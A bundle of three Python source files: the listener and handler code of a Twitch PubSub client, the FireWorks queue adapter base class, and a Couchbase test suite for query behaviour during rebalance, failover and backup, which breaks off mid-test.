self.__socket_loop.run_until_complete(self.__connection.close())
def __generic_listen(self, key, callback_func, required_scopes: List[AuthScope]) -> UUID:
for scope in required_scopes:
if scope not in self.__twitch.get_user_auth_scope():
raise MissingScopeException(str(scope))
uuid = get_uuid()
if key not in self.__topics.keys():
self.__topics[key] = {'subs': {}}
self.__topics[key]['subs'][uuid] = callback_func
if self.__startup_complete:
asyncio.get_event_loop().run_until_complete(self.__send_listen(str(uuid), [key]))
return uuid
###########################################################################################
# Asyncio Tasks
###########################################################################################
async def __task_initial_listen(self):
self.__startup_complete = True
if len(list(self.__topics.keys())) > 0:
uuid = str(get_uuid())
await self.__send_listen(uuid, list(self.__topics.keys()))
async def __task_heartbeat(self):
while True:
next_heartbeat = datetime.datetime.utcnow() + \
datetime.timedelta(seconds=randrange(self.ping_frequency - self.ping_jitter,
self.ping_frequency + self.ping_jitter,
1))
while datetime.datetime.utcnow() < next_heartbeat:
await asyncio.sleep(1)
self.__logger.debug('send ping...')
pong_timeout = datetime.datetime.utcnow() + datetime.timedelta(seconds=10)
self.__waiting_for_pong = True
await self.__send_message({'type': 'PING'})
while self.__waiting_for_pong:
if datetime.datetime.utcnow() > pong_timeout:
self.__logger.info('did not receive pong in time, reconnecting...')
await self.__connect()
self.__waiting_for_pong = False
await asyncio.sleep(1)
async def __task_receive(self):
async for message in self.__connection:
data = json.loads(message)
switcher: Dict[str, Callable] = {
'pong': self.__handle_pong,
'reconnect': self.__handle_reconnect,
'response': self.__handle_response,
'message': self.__handle_message
}
handler = switcher.get(data.get('type', '').lower(),
self.__handle_unknown)
self.__socket_loop.create_task(handler(data))
###########################################################################################
# Handler
###########################################################################################
async def __handle_pong(self, data):
self.__waiting_for_pong = False
self.__logger.debug('received pong')
async def __handle_reconnect(self, data):
self.__logger.info('received reconnect command, reconnecting now...')
await self.__connect()
async def __handle_response(self, data):
error = make_enum(data.get('error'),
PubSubResponseError,
PubSubResponseError.UNKNOWN)
self.__logger.debug(f'got response for nonce {data.get("nonce")}: {str(error)}')
self.__nonce_waiting_confirm[data.get('nonce')]['error'] = error
self.__nonce_waiting_confirm[data.get('nonce')]['received'] = True
async def __handle_message(self, data):
topic_data = self.__topics.get(data.get('data', {}).get('topic', ''), None)
msg_data = json.loads(data.get('data', {}).get('message', '{}'))
if topic_data is not None:
for uuid, sub in topic_data.get('subs', {}).items():
sub(uuid, msg_data)
async def __handle_unknown(self, data):
self.__logger.warning('got message of unknown type: ' + str(data))
###########################################################################################
# Listener
###########################################################################################
def unlisten(self, uuid: UUID) -> None:
"""
Stop listening to a specific Topic subscription.
:param ~uuid.UUID uuid: The UUID of the subscription you want to stop listening to
:raises ~twitchAPI.types.TwitchAuthorizationException: if Token is not valid
:raises ~twitchAPI.types.TwitchBackendException: if the Twitch Server has a problem
:raises ~twitchAPI.types.TwitchAPIException: if the server response is something else than suspected
:raises ~twitchAPI.types.PubSubListenTimeoutException: if the unsubscription is not confirmed in the time set by
`listen_confirm_timeout`
"""
clear_topics = []
for topic, topic_data in self.__topics.items():
if uuid in topic_data['subs'].keys():
topic_data['subs'].pop(uuid)
if len(topic_data['subs'].keys()) == 0:
clear_topics.append(topic)
if self.__startup_complete and len(clear_topics) > 0:
asyncio.get_event_loop().run_until_complete(self.__send_listen(str(uuid), clear_topics, subscribe=False))
if len(clear_topics) > 0:
for topic in clear_topics:
self.__topics.pop(topic)
def listen_whispers(self,
user_id: str,
callback_func: Callable[[UUID, dict], None]) -> UUID:
"""
You are notified when anyone whispers the specified user or the specified user whispers to anyone.\n
Requires the :const:`twitchAPI.types.AuthScope.WHISPERS_READ` AuthScope.\n
:param str user_id: ID of the User
:param Callable[[~uuid.UUID,dict],None] callback_func: Function called on event
:return: UUID of this subscription
:rtype: ~uuid.UUID
:raises ~twitchAPI.types.TwitchAuthorizationException: if Token is not valid
:raises ~twitchAPI.types.TwitchBackendException: if the Twitch Server has a problem
:raises ~twitchAPI.types.TwitchAPIException: if the subscription response is something else than suspected
:raises ~twitchAPI.types.PubSubListenTimeoutException: if the subscription is not confirmed in the time set by
`listen_confirm_timeout`
:raises ~twitchAPI.types.MissingScopeException: if required AuthScope is missing from Token
"""
return self.__generic_listen(f'whispers.{user_id}', callback_func, [AuthScope.WHISPERS_READ])
def listen_bits_v1(self,
channel_id: str,
callback_func: Callable[[UUID, dict], None]) -> UUID:
"""
You are notified when anyone cheers in the specified channel.\n
Requires the :const:`twitchAPI.types.AuthScope.BITS_READ` AuthScope.\n
:param str channel_id: ID of the Channel
:param Callable[[~uuid.UUID,dict],None] callback_func: Function called on event
:return: UUID of this subscription
:rtype: ~uuid.UUID
:raises ~twitchAPI.types.TwitchAuthorizationException: if Token is not valid
:raises ~twitchAPI.types.TwitchBackendException: if the Twitch Server has a problem
:raises ~twitchAPI.types.TwitchAPIException: if the subscription response is something else than suspected
:raises ~twitchAPI.types.PubSubListenTimeoutException: if the subscription is not confirmed in the time set by
`listen_confirm_timeout`
:raises ~twitchAPI.types.MissingScopeException: if required AuthScope is missing from Token
"""
return self.__generic_listen(f'channel-bits-events-v1.{channel_id}', callback_func, [AuthScope.BITS_READ])
def listen_bits(self,
channel_id: str,
callback_func: Callable[[UUID, dict], None]) -> UUID:
"""
You are notified when anyone cheers in the specified channel.\n
Requires the :const:`twitchAPI.types.AuthScope.BITS_READ` AuthScope.\n
:param str channel_id: ID of the Channel
:param Callable[[~uuid.UUID,dict],None] callback_func: Function called on event
:return: UUID of this subscription
:rtype: ~uuid.UUID
:raises ~twitchAPI.types.TwitchAuthorizationException: if Token is not valid
:raises ~twitchAPI.types.TwitchBackendException: if the Twitch Server has a problem
:raises ~twitchAPI.types.TwitchAPIException: if the subscription response is something else than suspected
:raises ~twitchAPI.types.PubSubListenTimeoutException: if the subscription is not confirmed in the time set by
`listen_confirm_timeout`
:raises ~twitchAPI.types.MissingScopeException: if required AuthScope is missing from Token
"""
return self.__generic_listen(f'channel-bits-events-v2.{channel_id}', callback_func, [AuthScope.BITS_READ])
def listen_bits_badge_notification(self,
channel_id: str,
callback_func: Callable[[UUID, dict], None]) -> UUID:
"""
You are notified when a user earns a new Bits badge in the given channel,
and chooses to share the notification with chat.\n
Requires the :const:`twitchAPI.types.AuthScope.BITS_READ` AuthScope.\n
:param str channel_id: ID of the Channel
:param Callable[[~uuid.UUID,dict],None] callback_func: Function called on event
:return: UUID of this subscription
:rtype: ~uuid.UUID
:raises ~twitchAPI.types.TwitchAuthorizationException: if Token is not valid
:raises ~twitchAPI.types.TwitchBackendException: if the Twitch Server has a problem
:raises ~twitchAPI.types.TwitchAPIException: if the subscription response is something else than suspected
:raises ~twitchAPI.types.PubSubListenTimeoutException: if the subscription is not confirmed in the time set by
`listen_confirm_timeout`
:raises ~twitchAPI.types.MissingScopeException: if required AuthScope is missing from Token
"""
return self.__generic_listen(f'channel-bits-badge-unlocks.{channel_id}', callback_func, [AuthScope.BITS_READ])
def listen_channel_points(self,
channel_id: str,
callback_func: Callable[[UUID, dict], None]) -> UUID:
"""
You are notified when a custom reward is redeemed in the channel.\n
Requires the :const:`twitchAPI.types.AuthScope.CHANNEL_READ_REDEMPTIONS` AuthScope.\n
:param str channel_id: ID of the Channel
:param Callable[[~uuid.UUID,dict],None] callback_func: Function called on event
:return: UUID of this subscription
:rtype: ~uuid.UUID
:raises ~twitchAPI.types.TwitchAuthorizationException: if Token is not valid
:raises ~twitchAPI.types.TwitchBackendException: if the Twitch Server has a problem
:raises ~twitchAPI.types.TwitchAPIException: if the subscription response is something else than suspected
:raises ~twitchAPI.types.PubSubListenTimeoutException: if the subscription is not confirmed in the time set by
`listen_confirm_timeout`
:raises ~twitchAPI.types.MissingScopeException: if required AuthScope is missing from Token
"""
return self.__generic_listen(f'channel-points-channel-v1.{channel_id}',
callback_func,
[AuthScope.CHANNEL_READ_REDEMPTIONS])
def listen_channel_subscriptions(self,
channel_id: str,
callback_func: Callable[[UUID, dict], None]) -> UUID:
"""
You are notified when anyone subscribes (first month), resubscribes (subsequent months),
or gifts a subscription to a channel. Subgift subscription messages contain recipient information.\n
Requires the :const:`twitchAPI.types.AuthScope.CHANNEL_READ_SUBSCRIPTIONS` AuthScope.\n
:param str channel_id: ID of the Channel
:param Callable[[~uuid.UUID,dict],None] callback_func: Function called on event
:return: UUID of this subscription
:rtype: ~uuid.UUID
:raises ~twitchAPI.types.TwitchAuthorizationException: if Token is not valid
:raises ~twitchAPI.types.TwitchBackendException: if the Twitch Server has a problem
:raises ~twitchAPI.types.TwitchAPIException: if the subscription response is something else than suspected
:raises ~twitchAPI.types.PubSubListenTimeoutException: if the subscription is not confirmed in the time set by
`listen_confirm_timeout`
:raises ~twitchAPI.types.MissingScopeException: if required AuthScope is missing from Token
"""
return self.__generic_listen(f'channel-subscribe-events-v1.{channel_id}',
callback_func,
[AuthScope.CHANNEL_READ_SUBSCRIPTIONS])
def listen_chat_moderator_actions(self,
user_id: str,
channel_id: str,
callback_func: Callable[[UUID, dict], None]) -> UUID:
"""
Supports moderators listening to the topic, as well as users listening to the topic to receive their own events.
Examples of moderator actions are bans, unbans, timeouts, deleting messages,
changing chat mode (followers-only, subs-only), changing AutoMod levels, and adding a mod.\n
Requires the :const:`twitchAPI.types.AuthScope.CHANNEL_MODERATE` AuthScope.\n
:param str user_id: ID of the User
:param str channel_id: ID of the Channel
:param Callable[[~uuid.UUID,dict],None] callback_func: Function called on event
:return: UUID of this subscription
:rtype: ~uuid.UUID
:raises ~twitchAPI.types.TwitchAuthorizationException: if Token is not valid
:raises ~twitchAPI.types.TwitchBackendException: if the Twitch Server has a problem
:raises ~twitchAPI.types.TwitchAPIException: if the subscription response is something else than suspected
:raises ~twitchAPI.types.PubSubListenTimeoutException: if the subscription is not confirmed in the time set by
`listen_confirm_timeout`
:raises ~twitchAPI.types.MissingScopeException: if required AuthScope is missing from Token
"""
return self.__generic_listen(f'chat_moderator_actions.{user_id}.{channel_id}',
callback_func,
[AuthScope.CHANNEL_MODERATE])
def listen_automod_queue(self,
moderator_id: str,
channel_id: str,
callback_func: Callable[[UUID, dict], None]) -> UUID:
"""
AutoMod flags a message as potentially inappropriate, and when a moderator takes action on a message.\n
Requires the :const:`twitchAPI.types.AuthScope.CHANNEL_MODERATE` AuthScope.\n
:param str moderator_id: ID of the Moderator
:param str channel_id: ID of the Channel
:param Callable[[~uuid.UUID,dict],None] callback_func: Function called on event
:return: UUID of this subscription
:rtype: ~uuid.UUID
:raises ~twitchAPI.types.TwitchAuthorizationException: if Token is not valid
:raises ~twitchAPI.types.TwitchBackendException: if the Twitch Server has a problem
:raises ~twitchAPI.types.TwitchAPIException: if the subscription response is something else than suspected
:raises ~twitchAPI.types.PubSubListenTimeoutException: if the subscription is not confirmed in the time set by
`listen_confirm_timeout`
:raises ~twitchAPI.types.MissingScopeException: if required AuthScope is missing from Token
"""
return self.__generic_listen(f'automod-queue.{moderator_id}.{channel_id}',
callback_func,
[AuthScope.CHANNEL_MODERATE])
def listen_user_moderation_notifications(self,
user_id: str,
channel_id: str,
callback_func: Callable[[UUID, dict], None]) -> UUID:
"""
A user’s message held by AutoMod has been approved or denied.\n
Requires the :const:`twitchAPI.types.AuthScope.CHAT_READ` AuthScope.\n
:param str user_id: ID of the User
:param str channel_id: ID of the Channel
:param Callable[[~uuid.UUID,dict],None] callback_func: Function called on event
:return: UUID of this subscription
:rtype: ~uuid.UUID
:raises ~twitchAPI.types.TwitchAuthorizationException: if Token is not valid
:raises ~twitchAPI.types.TwitchBackendException: if the Twitch Server has a problem
:raises ~twitchAPI.types.TwitchAPIException: if the subscription response is something else than suspected
:raises ~twitchAPI.types.PubSubListenTimeoutException: if the subscription is not confirmed in the time set by
`listen_confirm_timeout`
:raises ~twitchAPI.types.MissingScopeException: if required AuthScope is missing from Token
"""
return self.__generic_listen(f'user-moderation-notifications.{user_id}.{channel_id}',
callback_func,
[AuthScope.CHAT_READ])
def listen_undocumented_topic(self,
topic: str,
callback_func: Callable[[UUID, dict], None]) -> UUID:
"""
Listen to one of the many undocumented PubSub topics.
Make sure that you have the required AuthScope for your topic set, since this lib can not check it for you!
.. warning:: Using a undocumented topic can break at any time, use at your own risk!
:param str topic: the topic string
:param Callable[[~uuid.UUID,dict],None] callback_func: Function called on event
:rtype: ~uuid.UUID
:raises ~twitchAPI.types.TwitchAuthorizationException: if Token is not valid or does not have the required AuthScope
:raises ~twitchAPI.types.TwitchBackendException: if the Twitch Server has a problem
:raises ~twitchAPI.types.TwitchAPIException: if the subscription response is something else than suspected
:raises ~twitchAPI.types.PubSubListenTimeoutException: if the subscription is not confirmed in the time set by
`listen_confirm_timeout`
"""
self.__logger.warning(f"using undocumented topic {topic}")
return self.__generic_listen(topic, callback_func, [])
|
queue_adapter.py
|
# coding: utf-8
from __future__ import unicode_literals
"""
This module contains contracts for defining adapters to various queueing systems, e.g. PBS/SLURM/SGE.
"""
import os
import shlex
import string
import subprocess
import threading
import traceback
import abc
import collections
import six
from fireworks.utilities.fw_serializers import FWSerializable, serialize_fw
from fireworks.utilities.fw_utilities import get_fw_logger
__author__ = 'Anubhav Jain'
__credits__ = 'Shyue Ping Ong'
__copyright__ = 'Copyright 2013, The Materials Project'
__version__ = '0.1'
__maintainer__ = 'Anubhav Jain'
__email__ = 'ajain@lbl.gov'
__date__ = 'Feb 28, 2013'
class Command(object):
"""
Helper class - run subprocess commands in a different thread with TIMEOUT option.
From https://gist.github.com/kirpit/1306188
Based on jcollado's solution:
http://stackoverflow.com/questions/1191374/subprocess-with-timeout/4825933#4825933
"""
command = None
process = None
status = None
output, error = '', ''
def __init__(self, command):
"""
initialize the object.
Args:
command: command to run
"""
if isinstance(command, six.string_types):
command = shlex.split(command)
self.command = command
def run(self, timeout=None, **kwargs):
"""
Run the command.
Args:
timeout (float): timeout
kwargs (dict)
Returns:
(status, output, error)
"""
def target(**kwargs):
try:
self.process = subprocess.Popen(self.command, **kwargs)
self.output, self.error = self.process.communicate()
self.status = self.process.returncode
# Python3 - need to convert string to bytes
if isinstance(self.output, bytes):
self.output = self.output.decode("utf-8")
if isinstance(self.error, bytes):
self.error = self.error.decode("utf-8")
except:
self.error = traceback.format_exc()
self.status = -1
# default stdout and stderr
if 'stdout' not in kwargs:
kwargs['stdout'] = subprocess.PIPE
if 'stderr' not in kwargs:
kwargs['stderr'] = subprocess.PIPE
# thread
thread = threading.Thread(target=target, kwargs=kwargs)
thread.start()
thread.join(timeout)
if thread.is_alive():
self.process.terminate()
thread.join()
return self.status, self.output, self.error
class QueueAdapterBase(collections.defaultdict, FWSerializable):
"""
The QueueAdapter is responsible for all interactions with a specific queue management system.
This includes handling all details of queue script format as well as queue submission and
management.
A user should extend this class with implementations that work on specific queue systems.
Examples and implementations are in: fireworks/user_objects/queue_adapters.
Documentation on implementing queue adapters can be found on FireWorks home page,
http://fireworks.readthedocs.io/en/latest
"""
_fw_name = 'QueueAdapterBase'
template_file = 'OVERRIDE_ME' # path to template file for a queue script
submit_cmd = 'OVERRIDE_ME' # command to submit jobs, e.g. "qsub" or "squeue"
q_name = 'OVERRIDE_ME' # (arbitrary) name, e.g. "pbs" or "slurm"
defaults = {} # default parameter values for template
def get_script_str(self, launch_dir):
"""
returns a (multi-line) String representing the queue script, e.g. PBS script.
Uses the template_file along with internal parameters to create the script.
Args:
launch_dir (str): The directory the job will be launched in
Returns:
(str) the queue script
"""
with open(self.template_file) as f:
a = QScriptTemplate(f.read())
# set substitution dict for replacements into the template
subs_dict = {k: v for k, v in self.items()
if v is not None} # clean null values
for k, v in self.defaults.items():
subs_dict.setdefault(k, v)
subs_dict['job_name'] = subs_dict.get('job_name', 'FW_job')
launch_dir = os.path.abspath(launch_dir)
subs_dict['launch_dir'] = launch_dir
# might contain unused parameters as leftover $$
unclean_template = a.safe_substitute(subs_dict)
clean_template = filter(lambda l: "$$" not in l,
unclean_template.split('\n'))
return '\n'.join(clean_template)
@abc.abstractmethod
def submit_to_queue(self, script_file):
"""
Submits the job to the queue and returns the job id.
Args:
script_file: (str) name of the script file to use (String)
Returns:
(int) job_id
"""
pass
@abc.abstractmethod
def get_njobs_in_queue(self, username=None):
"""
Returns the number of jobs currently in the queue for the user.
Args:
username (str): the username of the jobs to count (default is to autodetect)
Returns:
(int) number of jobs in the queue
"""
pass
@serialize_fw
def to_dict(self):
return dict(self)
@classmethod
def from_dict(cls, m_dict):
return cls(m_dict)
def get_qlogger(self, name):
if 'logdir' in self:
return get_fw_logger(name, self['logdir'])
else:
return get_fw_logger(name, stream_level='CRITICAL')
class QScriptTemplate(string.Template):
delimiter = '$$'
|
tuq_cluster_ops.py
|
import time
import threading
import json
from security.auditmain import audit
from tuqquery.tuq_join import JoinTests
from remote.remote_util import RemoteMachineShellConnection
from membase.api.rest_client import RestConnection
from membase.helper.cluster_helper import ClusterOperationHelper
from backuptests import BackupHelper
from tuq_sanity import QuerySanityTests
class QueriesOpsTests(QuerySanityTests):
def setUp(self):
self.cluster_ops=True
super(QueriesOpsTests, self).setUp()
self.setup_query_nodes = self.input.param("setup_query_nodes", False)
self.query_params = {'scan_consistency' : 'statement_plus'}
if self.nodes_init > 1 and not self._testMethodName == 'suite_setUp':
if self.setup_query_nodes:
self.cluster.rebalance(self.servers[:1], self.servers[1:self.nodes_init], [], services=['n1ql'])
else:
self.cluster.rebalance(self.servers[:1], self.servers[1:self.nodes_init], [])
self.indx_type = self.input.param("indx_type", 'GSI')
self.stop_server = self.input.param("stop_server", False)
self.stop_source = self.input.param("stop_source", False)
self.network_partition = self.input.param("network_partition", False)
self.rebalance_index = self.input.param("rebalance_index", False)
self.rebalance_n1ql = self.input.param("rebalance_n1ql", False)
self.retry_time = self.input.param("retry_time", 300)
self.rebalance_out = self.input.param("rebalance_out", False)
self.num_retries = self.input.param("num_retries", 1)
self.fail = False
self.sleep_time = self.input.param("sleep_time", 10)
def suite_setUp(self):
super(QueriesOpsTests, self).suite_setUp()
def tearDown(self):
rest = RestConnection(self.master)
if rest._rebalance_progress_status() == 'running':
self.log.warning("rebalancing is still running, test should be verified")
stopped = rest.stop_rebalance()
self.assertTrue(stopped, msg="unable to stop rebalance")
try:
super(QueriesOpsTests, self).tearDown()
except:
pass
try:
ClusterOperationHelper.cleanup_cluster(self.servers, master=self.master)
self.sleep(1)
except:
for server in set(self.servers) - set([self.master]):
try:
rest = RestConnection(server)
rest.force_eject_node()
time.sleep(1)
except BaseException, e:
self.fail(e)
def suite_tearDown(self):
super(QueriesOpsTests, self).suite_tearDown()
def test_incr_rebalance_in(self):
self.assertTrue(len(self.servers) >= self.nodes_in + 1, "Servers are not enough")
index_field = self.input.param("index_field", 'job_title')
indexes = []
try:
indexes = self._create_multiple_indexes(index_field)
self.test_min()
for i in xrange(1, self.nodes_in + 1):
rebalance = self.cluster.async_rebalance(self.servers[:i],
self.servers[i:i + 1], [])
self.test_min()
rebalance.result()
self.test_min()
finally:
self._delete_multiple_indexes(indexes)
def test_incr_rebalance_out(self):
self.assertTrue(len(self.servers[:self.nodes_init]) > self.nodes_out,
"Servers are not enough")
index_field = self.input.param("index_field", 'job_title')
indexes = []
try:
indexes = self._create_multiple_indexes(index_field)
self.test_min()
for i in xrange(1, self.nodes_out + 1):
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init - (i - 1)],
[],
self.servers[self.nodes_init - i:self.nodes_init - (i - 1)])
self.test_min()
rebalance.result()
self.test_min()
finally:
self._delete_multiple_indexes(indexes)
def test_swap_rebalance(self):
self.assertTrue(len(self.servers) >= self.nodes_init + self.nodes_in,
"Servers are not enough")
index_field = self.input.param("index_field", 'name')
indexes = []
try:
indexes = self._create_multiple_indexes(index_field)
self.test_array_append()
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
self.servers[self.nodes_init:self.nodes_init + self.nodes_in],
self.servers[self.nodes_init - self.nodes_out:self.nodes_init])
self.test_array_append()
rebalance.result()
self.test_array_append()
finally:
self._delete_multiple_indexes(indexes)
def test_rebalance_with_server_crash(self):
servr_in = self.servers[self.nodes_init:self.nodes_init + self.nodes_in]
servr_out = self.servers[self.nodes_init - self.nodes_out:self.nodes_init]
self.test_case()
for i in xrange(3):
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
servr_in, servr_out)
self.sleep(5, "Wait some time for rebalance process and then kill memcached")
remote = RemoteMachineShellConnection(self.servers[self.nodes_init - 1])
remote.terminate_process(process_name='memcached')
self.test_case()
try:
rebalance.result()
except:
pass
self.cluster.rebalance(self.servers[:self.nodes_init], servr_in, servr_out)
self.test_case()
def test_failover(self):
index_field = self.input.param("index_field", 'name')
indexes = []
try:
indexes = self._create_multiple_indexes(index_field)
servr_out = self.servers[self.nodes_init - self.nodes_out:self.nodes_init]
self.test_union()
self.cluster.failover(self.servers[:self.nodes_init], servr_out)
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
[], servr_out)
self.test_union()
rebalance.result()
self.test_union()
finally:
self._delete_multiple_indexes(indexes)
def test_failover_add_back(self):
index_field = self.input.param("index_field", 'name')
indexes = []
try:
indexes = self._create_multiple_indexes(index_field)
servr_out = self.servers[self.nodes_init - self.nodes_out:self.nodes_init]
self.test_union()
nodes_all = RestConnection(self.master).node_statuses()
nodes = []
for failover_node in servr_out:
nodes.extend([node for node in nodes_all
if node.ip == failover_node.ip and str(node.port) == failover_node.port])
self.cluster.failover(self.servers[:self.nodes_init], servr_out)
for node in nodes:
RestConnection(self.master).add_back_node(node.id)
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], [])
self.test_union()
rebalance.result()
self.test_union()
finally:
self._delete_multiple_indexes(indexes)
def test_autofailover(self):
autofailover_timeout = 30
status = RestConnection(self.master).update_autofailover_settings(True, autofailover_timeout)
self.assertTrue(status, 'failed to change autofailover_settings!')
servr_out = self.servers[self.nodes_init - self.nodes_out:self.nodes_init]
self.test_union()
remote = RemoteMachineShellConnection(self.servers[self.nodes_init - 1])
try:
remote.stop_server()
self.sleep(autofailover_timeout + 10, "Wait for autofailover")
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
[], servr_out)
self.test_union()
rebalance.result()
self.test_union()
finally:
remote.start_server()
def test_cancel_query_mb_9223(self):
for bucket in self.buckets:
self.query = 'SELECT tasks_points.task1 AS points FROM %s AS test ' % (bucket.name) + \
'GROUP BY test.tasks_points.task1 ORDER BY points'
self.log.info("run query to cancel")
try:
RestConnection(self.master).query_tool(self.query, timeout=5)
except:
self.log.info("query is cancelled")
full_list = self.generate_full_docs_list(self.gens_load)
expected_result = [{"points" : doc["tasks_points"]["task1"]} for doc in full_list]
expected_result = [dict(y) for y in set(tuple(x.items()) for x in expected_result)]
expected_result = sorted(expected_result, key=lambda doc: doc['points'])
actual_result = self.run_cbq_query()
self._verify_results(actual_result['results'], expected_result)
def test_failover_with_server_crash(self):
servr_out = self.servers[self.nodes_init - self.nodes_out:self.nodes_init]
self.test_union()
self.cluster.failover(self.servers[:self.nodes_init], servr_out)
for i in xrange(3):
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
[], servr_out)
self.sleep(5, "Wait some time for rebalance process and then kill memcached")
self.shell.terminate_process(process_name='memcached')
self.test_union()
try:
rebalance.result()
except:
pass
rebalance = self.cluster.rebalance(self.servers[:self.nodes_init],
[], servr_out)
self.test_union()
def test_warmup(self):
index_field = self.input.param("index_field", 'name')
indexes = []
try:
indexes = self._create_multiple_indexes(index_field)
num_srv_warm_up = self.input.param("srv_warm_up", 1)
if self.input.tuq_client is None:
self.fail("For this test external tuq server is requiered. " + \
"Please specify one in conf")
self.test_union_all()
for server in self.servers[self.nodes_init - num_srv_warm_up:self.nodes_init]:
remote = RemoteMachineShellConnection(server)
remote.stop_server()
remote.start_server()
remote.disconnect()
#run query, result may not be as expected, but tuq shouldn't fail
try:
self.test_union_all()
except:
pass
ClusterOperationHelper.wait_for_ns_servers_or_assert(self.servers, self, wait_if_warmup=True)
self.verify_cluster_stats(self.servers[:self.nodes_init])
self.sleep(50)
self.verify_cluster_stats(self.servers[:self.nodes_init])
self.test_union_all()
finally:
self._delete_multiple_indexes(indexes)
def test_with_backup(self):
tmp_folder = "/tmp/backup"
try:
self.shell.create_directory(tmp_folder)
node = RestConnection(self.master).get_nodes_self()
self.is_membase = False
BackupHelper(self.master, self).backup('default', node, tmp_folder)
self.verify_cluster_stats(self.servers[:self.nodes_init])
self.test_union_all()
finally:
self.shell.delete_files(tmp_folder)
def test_queries_after_backup_restore(self):
method_name = self.input.param('to_run', 'test_any')
self.couchbase_login_info = "%s:%s" % (self.input.membase_settings.rest_username,
self.input.membase_settings.rest_password)
self.backup_location = self.input.param("backup_location", "/tmp/backup")
self.command_options = self.input.param("command_options", '')
shell = RemoteMachineShellConnection(self.master)
fn = getattr(self, method_name)
fn()
self.shell.execute_cluster_backup(self.couchbase_login_info, self.backup_location, self.command_options)
fn = getattr(self, method_name)
fn()
for bucket in self.buckets:
self.cluster.bucket_flush(self.master, bucket=bucket)
self.sleep(5, 'wait some time before restore')
shell.restore_backupFile(self.couchbase_login_info, self.backup_location, [bucket.name for bucket in self.buckets])
fn = getattr(self, method_name)
fn()
def test_queries_after_backup_with_view(self):
index_name = "Automation_backup_index"
method_name = self.input.param('to_run', 'test_any')
self.couchbase_login_info = "%s:%s" % (self.input.membase_settings.rest_username,
self.input.membase_settings.rest_password)
self.backup_location = self.input.param("backup_location", "/tmp/backup")
self.command_options = self.input.param("command_options", '')
index_field = self.input.param("index_field", '')
self.assertTrue(index_field, "Index field should be provided")
for bucket in self.bucket:
self.run_cbq_query(query="CREATE INDEX %s ON %s(%s)" % (index_name, bucket.name, ','.join(index_field.split(';'))))
try:
shell = RemoteMachineShellConnection(self.master)
fn = getattr(self, method_name)
fn()
self.shell.execute_cluster_backup(self.couchbase_login_info, self.backup_location, self.command_options)
fn = getattr(self, method_name)
fn()
for bucket in self.buckets:
self.cluster.bucket_flush(self.master, bucket=bucket)
self.sleep(5, 'wait some time before restore')
shell.restore_backupFile(self.couchbase_login_info, self.backup_location, [bucket.name for bucket in self.buckets])
fn = getattr(self, method_name)
fn()
finally:
for bucket in self.buckets:
self.run_cbq_query(query="DROP INDEX %s.%s" % (bucket.name, index_name))
def test_queries_after_backup_with_2i(self):
index_name = "Automation_backup_index"
method_name = self.input.param('to_run', 'test_any')
self.couchbase_login_info = "%s:%s" % (self.input.membase_settings.rest_username,
self.input.membase_settings.rest_password)
self.backup_location = self.input.param("backup_location", "/tmp/backup")
self.command_options = self.input.param("command_options", '')
index_field = self.input.param("index_field", '')
self.assertTrue(index_field, "Index field should be provided")
for bucket in self.bucket:
query = "CREATE INDEX %s ON %s(%s) USING GSI" % (index_name, bucket.name, ','.join(index_field.split(';')))
# if self.gsi_type:
# query += " WITH {'index_type': 'memdb'}"
self.run_cbq_query(query=query)
try:
shell = RemoteMachineShellConnection(self.master)
fn = getattr(self, method_name)
fn()
self.shell.execute_cluster_backup(self.couchbase_login_info, self.backup_location, self.command_options)
fn = getattr(self, method_name)
fn()
for bucket in self.buckets:
self.cluster.bucket_flush(self.master, bucket=bucket)
self.sleep(5, 'wait some time before restore')
shell.restore_backupFile(self.couchbase_login_info, self.backup_location, [bucket.name for bucket in self.buckets])
fn = getattr(self, method_name)
fn()
finally:
for bucket in self.buckets:
self.run_cbq_query(query="DROP INDEX %s.%s" % (bucket.name, index_name))
def test_audit_add_node(self):
eventID = 8196 #add node
server = self.master
if self.input.tuq_client and "client" in self.input.tuq_client:
server = self.input.tuq_client["client"]
index_field = self.input.param("index_field", 'job_title')
indexes = []
try:
audit_reb_in = audit(eventID=eventID, host=server)
indexes = self._create_multiple_indexes(index_field)
servers_in = self.servers[1:self.nodes_in]
rebalance = self.cluster.async_rebalance(self.servers[:1],
servers_in, [], services=self.services_in)
expected_result = {"services": self.services_in, 'port':8091, 'hostname': servers_in[0].ip, 'groupUUID':"0",
'node':'ns_1@' + servers_in[0].ip, 'source':'ns_server', 'user': self.master.rest_username,
"ip": self.getLocalIPAddress(), "port": 57457}
self.test_min()
audit_reb_in.checkConfig(expected_result)
rebalance.result()
finally:
for bucket in self.buckets:
for index_name in set(indexes):
self.run_cbq_query(query="DROP INDEX %s.%s" % (bucket.name, index_name))
def test_audit_rm_node(self):
eventID = 8197 #add node
server = self.master
if self.input.tuq_client and "client" in self.input.tuq_client:
server = self.input.tuq_client["client"]
index_field = self.input.param("index_field", 'job_title')
indexes = []
try:
audit_reb_out = audit(eventID=eventID, host=server)
indexes = self._create_multiple_indexes(index_field)
servers_in = self.servers[1:self.nodes_in]
self.cluster.rebalance(self.servers[:1], servers_in, [], services=self.services_in)
rebalance = self.cluster.rebalance(self.servers[:1], [], servers_in)
expected_result = {"services": self.services_in, 'port':8091, 'hostname': servers_in[0].ip, 'groupUUID':"0",
'node':'ns_1@' + servers_in[0].ip, 'source':'ns_server', 'user': self.master.rest_username,
"ip": self.getLocalIPAddress(), "port": 57457}
self.test_min()
audit_reb_out.checkConfig(expected_result)
rebalance.result()
finally:
for bucket in self.buckets:
for index_name in set(indexes):
self.run_cbq_query(query="DROP INDEX %s.%s" % (bucket.name, index_name))
def test_rebalance_in_stop_node(self):
self.assertTrue(len(self.servers) >= self.nodes_in + 1, "Servers are not enough")
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
self.servers[1:(self.nodes_init + 1)], self.servers[:1], services=['kv,index'])
rebalance.result()
rebalance = self.cluster.async_rebalance(self.servers[1:self.nodes_init+1],
self.servers[:1], [], services=['n1ql'])
rebalance.result()
try:
thread1 = threading.Thread(name='run_query', target=self.run_queries_until_timeout)
thread1.start()
if self.stop_source:
remote = RemoteMachineShellConnection(self.servers[0])
remote.stop_server()
